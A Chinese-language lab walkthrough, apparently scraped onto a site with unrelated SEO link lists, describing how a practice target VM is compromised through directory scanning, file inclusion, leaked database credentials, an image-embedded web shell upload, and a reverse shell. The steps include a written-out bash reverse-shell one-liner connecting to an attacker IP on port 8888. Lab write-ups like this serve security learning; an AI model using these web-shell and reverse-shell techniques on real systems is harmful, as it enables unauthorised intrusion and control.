当前位置: 首页 > wzjs >正文

网站项目建设方案百度seo排名优

网站项目建设方案,百度seo排名优,wordpress 移动端模板下载,职工之家网站开发新闻稿1.安装并开启靶机 2.获取靶机IP 3.浏览器访问靶机 4.获取敏感目录 5.访问目录 http://192.168.40.143/in 可能存在文件包含漏洞 http://192.168.40.143/add 尝试上传无反应 http://192.168.40.143/test 尝试文件包含 尝试改用POST传参&a…

1.安装并开启靶机

2.获取靶机IP 

3.浏览器访问靶机 

4.获取敏感目录 

5.访问目录

http://192.168.40.143/in            可能存在文件包含漏洞

http://192.168.40.143/add           尝试上传无反应

http://192.168.40.143/test             尝试文件包含

尝试改用POST传参,包含成功

查看c.php,发现了疑似数据库用户名密码及库名 

http://192.168.40.143/phpmy/                尝试登录数据库,登陆成功

 发现用户名密码,尝试登录最初页面,登陆成功

发现文件上传节点

6.制作图片马并上传

新建2.asp写入一句话木马 

打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马 

上传成功

点击continue,用BP抓包

 

7.反弹shell 

echo "bash -i >& /dev/tcp/192.168.40.133/8888 0>&1" | bash

进行url编码,同时打开Kali监听

将转码复制在 cmd= 后,反弹 shell 

反弹shell成功 

http://www.dtcms.com/wzjs/387780.html

相关文章:

  • 英特尔nuc做网站服务器查网站关键词工具
  • 比较好的微网站开发平台谷歌搜索引擎免费入口
  • 做测试日本网站seo专业优化方法
  • 武汉品牌网站建设公司哪家好网站关键词优化系统
  • 采集微信公众号 做网站站长之家综合查询工具
  • 哪个网站做任务赚钱多搜索引擎推广案例
  • 做网站图片需要什么格式国内新闻最新消息今天简短
  • asp做网站的缺点搜索引擎网址有哪些
  • 如何制作课程网站模板网站流量监控
  • 建设通网站首页网络营销总结
  • 做一个网站大概需要多少钱线上营销活动案例
  • php做网站登陆验证sem竞价托管
  • 网站设计需求原型图广告联盟app下载赚钱
  • 营销网站制作公司推荐站长工具爱情岛
  • 重庆景点排名谷歌seo排名优化服务
  • 嘉兴公司网站建设南京seo公司排名
  • 东莞的网站建设公司哪家好凡科建站登录入口
  • 设计一个电商网站的首页网络策划书范文
  • 自己做百度网站武汉大学人民医院光谷院区
  • 做性的网站nba最新消息
  • 北京seoqq群百度搜索优化
  • 政府网站开发鹤壁seo推广
  • 网站开发排期表模板苏州优化收费
  • 网站怎么更新内容国外直播平台tiktok
  • 织梦设置中英文网站网络推广员为什么做不长
  • mip改造wordpressseo的作用是什么
  • 中央回应恶意不买房seo搜索铺文章
  • 阿里巴巴黄页网1688长春百度快速优化
  • 部门网站建设的工作领导小组网络推广哪个平台效果最好
  • 咸阳做网站优化seo整站优化报价